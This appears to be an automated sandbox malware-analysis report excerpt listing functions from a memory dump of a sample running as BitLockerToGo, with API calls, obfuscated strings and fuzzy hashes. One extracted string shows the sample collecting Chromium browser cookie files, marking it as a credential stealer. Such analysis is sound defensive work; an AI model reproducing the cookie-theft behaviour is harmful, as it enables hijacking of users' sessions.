                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: DrivesLogical
                      • String ID:
                      • API String ID: 999431828-0
                      • Opcode ID: 636b58914c714f165ae7461a1c44e325e477a3219288439fde57563cfb478dcc
                      • Instruction ID: 84e4c7ce093974773d5b173fb3417fe0563ac340380f1b558529fb92bba1cd4a
                      • Opcode Fuzzy Hash: 636b58914c714f165ae7461a1c44e325e477a3219288439fde57563cfb478dcc
                      • Instruction Fuzzy Hash: BE1136BCC95148EFC741AF20FE014647AEBAB8A70A7840DA5F81592511EF37D43A8F65
                      APIs
                      • GetSystemDirectoryW.KERNEL32(?), ref: 02A107B9
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: DirectorySystem
                      • String ID:
                      • API String ID: 2188284642-0
                      • Opcode ID: 08f5c60acf470746a449bace876c2058c48a0b5e4331013c2165ec6fe70c3a7b
                      • Instruction ID: 54df75715524655e1f419dec42d3d259024a8dd0c401d1074a24bb1ec2261f93
                      • Opcode Fuzzy Hash: 08f5c60acf470746a449bace876c2058c48a0b5e4331013c2165ec6fe70c3a7b
                      • Instruction Fuzzy Hash: E0F046F6D485544BD33893309DC112FB2D7EF89228F19462AEC51CA280DB39CC428EA2
                      APIs
                      • GetUserDefaultUILanguage.KERNELBASE ref: 02A31FDA
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: DefaultLanguageUser
                      • String ID:
                      • API String ID: 95929093-0
                      • Opcode ID: 04cc30a39f37dd29aaaa4ab27c5f4116940f5323f730b87abe91bf904c4bcab5
                      • Instruction ID: fd55b50ebf72c041de5c7f4cdb3049b682729edf1931edfb264dcf78aa753ec9
                      • Opcode Fuzzy Hash: 04cc30a39f37dd29aaaa4ab27c5f4116940f5323f730b87abe91bf904c4bcab5
                      • Instruction Fuzzy Hash: 53E04F7A1015028FC310EF78D69065ABBE2FFC4304F258928D89947344D735F856CF92
                      APIs
                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 02A37E96
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 843cb7da03fc5d88cfe4f56040a6287f0f34c4a27ab18e158407f970f497d75f
                      • Instruction ID: aef11b2a9e6ef3271d37efc332d2b49b758c0157484442b6b338df62924bd76b
                      • Opcode Fuzzy Hash: 843cb7da03fc5d88cfe4f56040a6287f0f34c4a27ab18e158407f970f497d75f
                      • Instruction Fuzzy Hash: 9BA0127098420069D018DA104C00F31925C9B8BB01F101408940852081C912D4004014
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: Clipboard$CloseDataLongOpenWindow
                      • String ID: C
                      • API String ID: 1647500905-1037565863
                      • Opcode ID: 09a5f7dffd635b16a462008eb55fc7a73644364f60d1e9e5083e238f686f5e0a
                      • Instruction ID: 5f479acdd3f3fced87641ea4acee2a7418dbe890de0235cf9961ca4575151a02
                      • Opcode Fuzzy Hash: 09a5f7dffd635b16a462008eb55fc7a73644364f60d1e9e5083e238f686f5e0a
                      • Instruction Fuzzy Hash: 9B614CB4508741CFC720DF3CD484616BBF5AB5A320F148A59E8EACB795DB35E406CB92
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: &$.$6$6$>$>$d$f$g
                      • API String ID: 0-3672295413
                      • Opcode ID: 3b3920bd3034ffba09380ed854d05ed78fffe247f815ca09b07bb6dcd15cf414
                      • Instruction ID: df71ee27fc9cd0ffe821735683f81dc3dfe4b760433f974c4aff5c80cb9ea65c
                      • Opcode Fuzzy Hash: 3b3920bd3034ffba09380ed854d05ed78fffe247f815ca09b07bb6dcd15cf414
                      • Instruction Fuzzy Hash: 0AD1077999C291CFD3048F28E4622A5BBE0FB96341F490DADD4D9822C1DB3AC1A6CF51
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: .$.$0$[$false$null$true${
                      • API String ID: 0-1639024219
                      • Opcode ID: 8b5d825f6c6551e08b692488428dfbf4b8d9fb774f0fe60aaa2f85997bf061a4
                      • Instruction ID: d1a4025dea1dbdfb305e7e390b565a91033530ff45ff36df0714d3a889de34ce
                      • Opcode Fuzzy Hash: 8b5d825f6c6551e08b692488428dfbf4b8d9fb774f0fe60aaa2f85997bf061a4
                      • Instruction Fuzzy Hash: D80226B0A403069BE7105F25FDD876ABBE9AF44348F044539EC8A872C2EF35E514CB96
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: X9n;$d5`7$m)H+$n=q?$yz$uw
                      • API String ID: 0-2790254193
                      • Opcode ID: b5548c9f80eff8b81d8b7b06320549dbf4e496f207136bc986f0d0838e413c83
                      • Instruction ID: aefb95ff344a3c3f54ad8f8d38e2fd5104970b9164c26a50b442033e50a8d267
                      • Opcode Fuzzy Hash: b5548c9f80eff8b81d8b7b06320549dbf4e496f207136bc986f0d0838e413c83
                      • Instruction Fuzzy Hash: 351245B5500B41DFD3248F26D891B97BBE2FB88314F108E2DD5AA8BA90DB75E456CF40
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: #;~#$4$$($40z4$=& s$bm'3$r
                      • API String ID: 0-1136624806
                      • Opcode ID: 2d6256ed1e102106f78225bfc3f47f54ee423b3e03970849774b210b8419325c
                      • Instruction ID: 735b66d00f72cfea0bdf0c3978bf1495121e1ffdb2ed71339809a5bce762c1cb
                      • Opcode Fuzzy Hash: 2d6256ed1e102106f78225bfc3f47f54ee423b3e03970849774b210b8419325c
                      • Instruction Fuzzy Hash: 4DA1907160D3918FE729CF24C4D07AABBE2AF96318F18495DD4D54B381CB3A9406CB97
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: afdx$mfgs$o3jg$|~}x$~pv~
                      • API String ID: 0-954730600
                      • Opcode ID: 0aaf328b2db3e938eaaaff79852de80170ab9183d51e0978844bd30fe6a6041b
                      • Instruction ID: d766ec24b42df9b934ee7debfacb1370f2445169f0a3b2d4df1d588fc8dd2338
                      • Opcode Fuzzy Hash: 0aaf328b2db3e938eaaaff79852de80170ab9183d51e0978844bd30fe6a6041b
                      • Instruction Fuzzy Hash: EA51D3769083608BD7348F18C8917ABB7F1FF95354F15892DD5CD8B242EB389809CB96
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: 1;$<I"W$TU$~M&K
                      • API String ID: 0-1468034955
                      • Opcode ID: 115f51a18b96012be38f6921417e7958efaab1e2eba1d03a9c67309f7c5b67a5
                      • Instruction ID: d98386e818f9028e05fc8da9a6835fc808f50dab588638f622d35bd394e4babc
                      • Opcode Fuzzy Hash: 115f51a18b96012be38f6921417e7958efaab1e2eba1d03a9c67309f7c5b67a5
                      • Instruction Fuzzy Hash: 50129775A083419BD728CF24C890B6BB7E2FFC5324F484D2DE8858B291EB75D945CB92
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: D@VB$T$V#M$ek
                      • API String ID: 0-1646848610
                      • Opcode ID: 10973985979f5883d4f98b21bf0dad139d92a3466a8823947a0b118226314aee
                      • Instruction ID: 44790a5d3a9877c15422d8b05e439fccb7f126c929aebf568f4965694221e70d
                      • Opcode Fuzzy Hash: 10973985979f5883d4f98b21bf0dad139d92a3466a8823947a0b118226314aee
                      • Instruction Fuzzy Hash: 5B81BF715093918BD311CF26C09074BFFE2AFD6765F188A8CE4C42B39AC7359946CB86
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: GLDO$TDK^$[DTJ
                      • API String ID: 0-125455974
                      • Opcode ID: 45e8d9d77771fa1052175e8a41be58b52d2ea3f3c4b7e1f2770692abec278ff6
                      • Instruction ID: a1011efe427187b74537b134c61dd614f072bb4da91242a0cf02f9ef4ba1ba12
                      • Opcode Fuzzy Hash: 45e8d9d77771fa1052175e8a41be58b52d2ea3f3c4b7e1f2770692abec278ff6
                      • Instruction Fuzzy Hash: A4F18F75600B118FC334CF29D890666B7F2FF89314B198A2DD5AA8BB91DB35F849CB50
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: D$[info] collected cookies file of the chromium-based browser$Y
                      • API String ID: 0-2458585964
                      • Opcode ID: ca36dcf738120837e416762ee6ee3c9c5f373bbe9f7e45afcaa228cf7f543e45
                      • Instruction ID: 25050c57c535d94389c426558c3922bb45fb26522506fd8c1ceb970251a9493c
                      • Opcode Fuzzy Hash: ca36dcf738120837e416762ee6ee3c9c5f373bbe9f7e45afcaa228cf7f543e45
                      • Instruction Fuzzy Hash: 91C143B05583819BE328DF10D8A0B6FBBE2FFC1754F50490CE5C90B291CBB99849CB96
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0$8
                      • API String ID: 0-46163386
                      • Opcode ID: 953fe0f36bbe218e7026940dbea6ad5420f02d4ea65d6e11216de0526fbf22e7
                      • Instruction ID: be816165d7670bddd10ffa8f18e8bf2b63088f4e49316cc2955703f85c37bd77
                      • Opcode Fuzzy Hash: 953fe0f36bbe218e7026940dbea6ad5420f02d4ea65d6e11216de0526fbf22e7
                      • Instruction Fuzzy Hash: 5C728971A083409FD724CF19D880B5ABBE2BF88318F48891DF9998B391DB75D944CF92
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: vA@C
                      • API String ID: 0-31758468
                      • Opcode ID: a667a405d2e84ea8914a4860e2493d4c28d2723731dd8ab77d0548246ffcc2cb
                      • Instruction ID: ff9343edfb481d5d0f291d274e6b97b15cffae381eab07166e0a8f42cbd5814f
                      • Opcode Fuzzy Hash: a667a405d2e84ea8914a4860e2493d4c28d2723731dd8ab77d0548246ffcc2cb
                      • Instruction Fuzzy Hash: BD22CE35A09251CFC708CF28D89066AB7F2FBC9318F098D6DE99597351CB31E926CB81
                      APIs
                      • CoCreateInstance.OLE32(02A3F748,00000000,00000001,02A3F738), ref: 02A1DFD9
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: CreateInstance
                      • String ID:
                      • API String ID: 542301482-0
                      • Opcode ID: df6a0a0c6e868d63249da9f50317d08fa5697b75a1a2dea6b239c54ab9c1705f
                      • Instruction ID: 78e91bb599af06660b3b4c7e5c140e94e568bda10950aae6f61525c769e6ca0b
                      • Opcode Fuzzy Hash: df6a0a0c6e868d63249da9f50317d08fa5697b75a1a2dea6b239c54ab9c1705f
                      • Instruction Fuzzy Hash: A951BCB1A502009BEB249B24CD86B7373B5FFA5368F084558FE858B390EB76E844C765
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID: 0-3916222277
                      • Opcode ID: e182f00c319e48e035d4b0bc7a3b73a9160479e10585f964332fa261ef2f1b40
                      • Instruction ID: 7fec8a1d1bc288323989fac67d1e21444f8340274bb2dc34aa78d868bf726b0d
                      • Opcode Fuzzy Hash: e182f00c319e48e035d4b0bc7a3b73a9160479e10585f964332fa261ef2f1b40
                      • Instruction Fuzzy Hash: 47E1D77E95C291CFD3088F24E4613667BE0FB9A341F494DADD1C983281DB3AD5A2CB51
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: gxyz
                      • API String ID: 0-2474275795
                      • Opcode ID: dabf74cd39593cb316df2b02b7e1bcff3cd19c93b501e60c24bedc6dd7bd50a6
                      • Instruction ID: 740f147b9a2a79f8e3ad7c3bbc92da5266e0f1ccaf5a8b872a73362d846f9103
                      • Opcode Fuzzy Hash: dabf74cd39593cb316df2b02b7e1bcff3cd19c93b501e60c24bedc6dd7bd50a6
                      • Instruction Fuzzy Hash: 4DE19E75908362CBC328CF18C4906AAB3F2FFD9744F55896CD4CA87251EB35D959CB82
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: "
                      • API String ID: 0-123907689
                      • Opcode ID: 67417c906a09afae9669f2acc98fb53cf0883053204df2d0a195b42da69b657e
                      • Instruction ID: da0fadf963cbfbfafeacbfafd818cea3459c23fcaf7c3732f6bfa1731b42e14c
                      • Opcode Fuzzy Hash: 67417c906a09afae9669f2acc98fb53cf0883053204df2d0a195b42da69b657e
                      • Instruction Fuzzy Hash: A5C1E771A483215FD715CF2C8C80B6BF7EAAF84354F08895DE8998B391EB34DA49C791
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: HI
                      • API String ID: 0-1987653318
                      • Opcode ID: 22149963f2ef524b463da07670c68972d671a0bde3235f9a26f6afb977fb1181
                      • Instruction ID: 939c06047bcc808a3332b316c32e9b3ef92369d4667c7ff921ffeff7fd1ec026
                      • Opcode Fuzzy Hash: 22149963f2ef524b463da07670c68972d671a0bde3235f9a26f6afb977fb1181
                      • Instruction Fuzzy Hash: 9FB1CF715083108BC714CF18C89176BB7F2EF95368F188A1DE9958B391EB35E945CBA2
                      Strings
                      • [info] collected cookies file of the chromium-based browser, xrefs: 02A1E9EF
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: [info] collected cookies file of the chromium-based browser
                      • API String ID: 0-3235166063
                      • Opcode ID: 4bc2f385423615006d478c2c9e2dca62dce8ee2bd11bddfe1cf045c2ea184127
                      • Instruction ID: 464f0017f350767d5c319a0286197d373a1093b4570b939b7948a19acc7facd1
                      • Opcode Fuzzy Hash: 4bc2f385423615006d478c2c9e2dca62dce8ee2bd11bddfe1cf045c2ea184127
                      • Instruction Fuzzy Hash: A9D16D75A083519FD329CF18C49072AFBE1FBC5364F18892CE9958B391DB75D842CB82
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: "
                      • API String ID: 0-123907689
                      • Opcode ID: bb4325f45638170b919d545a65d4429e963da34ce308d6dcb52940f6c5e66227
                      • Instruction ID: a7c0cbab12ab0941c7ee310c5c4cc98df5c28527c3d031074a181fa9464637fd
                      • Opcode Fuzzy Hash: bb4325f45638170b919d545a65d4429e963da34ce308d6dcb52940f6c5e66227
                      • Instruction Fuzzy Hash: 7DA194326083268FC714CF2DCD8061AF7E2ABC9724F19C92DE49897395DB74DE498B81
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: R5Z3
                      • API String ID: 0-2640636806
                      • Opcode ID: aa30d2c59da2619993602a0d4c0f1e66c1d04f7c1379fef2d46dc85f1457c8e7
                      • Instruction ID: 0ffa43246414be23bbd75bfd12f56d2d3aec1e1128b5013d5346ec117482cc05
                      • Opcode Fuzzy Hash: aa30d2c59da2619993602a0d4c0f1e66c1d04f7c1379fef2d46dc85f1457c8e7
                      • Instruction Fuzzy Hash: AE919C756043029FC715CF18D890A6AB7F2FF88764F15891DF985AB2A1EB30EC51CB81
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: ,
                      • API String ID: 0-3772416878
                      • Opcode ID: 734697f72093dec697da5c16b79b09f48496df7dbee9d0dddb6af60765f6d485
                      • Instruction ID: 3e281e4e36af98af6de79093612d90f68a6afe3179723f17e74cc78f5de2df6b
                      • Opcode Fuzzy Hash: 734697f72093dec697da5c16b79b09f48496df7dbee9d0dddb6af60765f6d485
                      • Instruction Fuzzy Hash: 09B15A711097819FD314CF28D88475BFBE1AF99708F444A2DF49897782C771EA28CB96
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: D
                      • API String ID: 0-2746444292
                      • Opcode ID: 3fbdec7661b80a33721877fe397b0cda8f58af9b314b0c666dd9eb24287e9c6f
                      • Instruction ID: b18e6eab99dfaaa630594da8a2435af947f7081be4e0cf59e2f6ab493182f614
                      • Opcode Fuzzy Hash: 3fbdec7661b80a33721877fe397b0cda8f58af9b314b0c666dd9eb24287e9c6f
                      • Instruction Fuzzy Hash: 7471E1B05083818BD324CF25C8A175BBBF2FF82758F148D1CE5A58B290D7B99809CB86
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d46a4a93a4da6cd2e731796d7b578bb59afd0a934d56a364cf68c9d5c7b6105b
                      • Instruction ID: fd361eda4b78c9c894776c92b3e72e137c2e2dd8c232397fdeb0e3806f882a0d
                      • Opcode Fuzzy Hash: d46a4a93a4da6cd2e731796d7b578bb59afd0a934d56a364cf68c9d5c7b6105b
                      • Instruction Fuzzy Hash: ED52D03AA09251CFC708CF28D49065AB7F2FBCA314F098D6DE99997355CB31E816CB81
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b3d8a40bbcba3dd860613efe2d28db23a97342c344f86a68f51e0ad8922ec3d9
                      • Instruction ID: cd36e0f9673c53763ded9c901a2f88e6fe90397d5816dda83c69f4b16f344559
                      • Opcode Fuzzy Hash: b3d8a40bbcba3dd860613efe2d28db23a97342c344f86a68f51e0ad8922ec3d9
                      • Instruction Fuzzy Hash: 1042BD39A09251CFC708CF28D49065AB7E2FBC9314F098D6DE99597355CB32E866CB81
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4fbc53842b38508550f385baeca4452031de9cb3934d8a64bbdef5fb7343e695
                      • Instruction ID: 0138a215b3ce949da8413cb4cb4725fd781463df2c20bad4194b4aa57d3fae77
                      • Opcode Fuzzy Hash: 4fbc53842b38508550f385baeca4452031de9cb3934d8a64bbdef5fb7343e695
                      • Instruction Fuzzy Hash: 5342B1316087118FC724DF58E8C427AB3E1FFC4319F194A2DD996872C5EB39A855CB8A
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6dfc927db1e52871d316045f0cb878f0e77d1d1c38f9c76a91fec734e2e80168
                      • Instruction ID: b216fceb81f2503d9d063db677db56513f2a986bbf3ee1f57482b7ea42625a6f
                      • Opcode Fuzzy Hash: 6dfc927db1e52871d316045f0cb878f0e77d1d1c38f9c76a91fec734e2e80168
                      • Instruction Fuzzy Hash: EF22DF39A09251CFC708CF28D49066AB7F2FBC9318F098D6DE99597351CB31E966CB81
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6701d4d19493718034ed081bfd7dd0a552cca0277a4e13a72d9ca30b83aa62e9
                      • Instruction ID: 5011fda048142b2e3d3966aabbe6cb47e1743a9ebe8c74d2f421df85d8141cce
                      • Opcode Fuzzy Hash: 6701d4d19493718034ed081bfd7dd0a552cca0277a4e13a72d9ca30b83aa62e9
                      • Instruction Fuzzy Hash: 8E6290716083528FC715CF19D0D066AF7E1BF88314F198AADE9D99B382CB35E985CB81
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ca42736165be2668b688e42b8530cb41558de7c6ac550d9eb99927af62d38182
                      • Instruction ID: acfed64012f46a42fb92856072f2d31c603112c04842aad32917a98ed162685f
                      • Opcode Fuzzy Hash: ca42736165be2668b688e42b8530cb41558de7c6ac550d9eb99927af62d38182
                      • Instruction Fuzzy Hash: B15287B5600B41CFD728CF29D490B16BBF2BF89314F148A6DD5968BB91DB35E815CB80
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0cdb88c655ead0cd730bb6ec9ab43fda9b4ce180ee5da17424535f0ab025ee9e
                      • Instruction ID: 805f9d04995f83a339d48de2bf92cceeef57ae6f2fefe0b41e96d591525c0585
                      • Opcode Fuzzy Hash: 0cdb88c655ead0cd730bb6ec9ab43fda9b4ce180ee5da17424535f0ab025ee9e
                      • Instruction Fuzzy Hash: 4E4286B4600B41CFD728CF29D490B16BBF2BF89314F148A6DD5968BB91DB35E856CB80
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 871f83f2a90c50c4bdcc436ae1a5e3215a096a49ba873e2638091fe61a0cc9b0
                      • Instruction ID: ca6139364f73fa00786c29fd38f8e007ce970aaa92e5f418b615ac78d0ad9561
                      • Opcode Fuzzy Hash: 871f83f2a90c50c4bdcc436ae1a5e3215a096a49ba873e2638091fe61a0cc9b0
                      • Instruction Fuzzy Hash: A012AC35A09251CFC708CF28D89066AB7E2FFC9318F098D6DE58697391DB32E915CB91
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 50f2445446c25462b4f8fbffe0ece20e34aae9849a79efa3624b9d4ec50605f3
                      • Instruction ID: 89bbf830e839b02115acc289b11f69e2ee8605297c1302cf0291c160efd33b9a
                      • Opcode Fuzzy Hash: 50f2445446c25462b4f8fbffe0ece20e34aae9849a79efa3624b9d4ec50605f3
                      • Instruction Fuzzy Hash: 4C4220B4514B518FC368CF29E5D066ABBF1BF89310B908A2DD6978BB90DB35F844CB14
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 742987c90e22ed08cf6cbac228dd9194c393015a6de6f76366b14105b33c390a
                      • Instruction ID: 1ccf484accc00cc6da804a70957d04f2d3f6e83000eedf55d9d38a3332694b0b
                      • Opcode Fuzzy Hash: 742987c90e22ed08cf6cbac228dd9194c393015a6de6f76366b14105b33c390a
